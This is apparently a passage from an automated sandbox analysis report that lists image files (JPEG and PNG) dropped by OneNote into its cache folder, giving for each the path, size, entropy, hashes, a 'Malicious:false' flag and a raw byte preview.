                                                                                                  MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                  SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                  SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                  SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40035
                                                                                                  Entropy (8bit):7.360144465307449
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                  MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                  SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                  SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                  SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008G.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):242903
                                                                                                  Entropy (8bit):7.944495275553473
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                  MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                  SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                  SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                  SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008I.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70028
                                                                                                  Entropy (8bit):7.742089280742944
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                  MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                  SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                  SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                  SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008K.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24268
                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008M.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):47294
                                                                                                  Entropy (8bit):7.497888607667405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                  MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                  SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                  SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                  SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008O.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):347
                                                                                                  Entropy (8bit):6.85024426015615
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                  MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                  SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                  SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                  SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):827
                                                                                                  Entropy (8bit):7.23139555596658
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                  MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                  SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                  SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                  SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008S.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4410
                                                                                                  Entropy (8bit):7.857636973514526
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                  MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                  SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                  SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                  SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):136726
                                                                                                  Entropy (8bit):7.973487854173386
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                  MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                  SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                  SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                  SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000090.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5136
                                                                                                  Entropy (8bit):7.622045262603241
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                  MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                  SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                  SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                  SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000092.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52945
                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000094.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):79656
                                                                                                  Entropy (8bit):7.966459570826366
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                  MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                  SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                  SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                  SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000096.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40884
                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000098.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):68633
                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009A.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11043
                                                                                                  Entropy (8bit):7.96811228801767
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                  MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                  SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                  SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                  SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                  Malicious:false
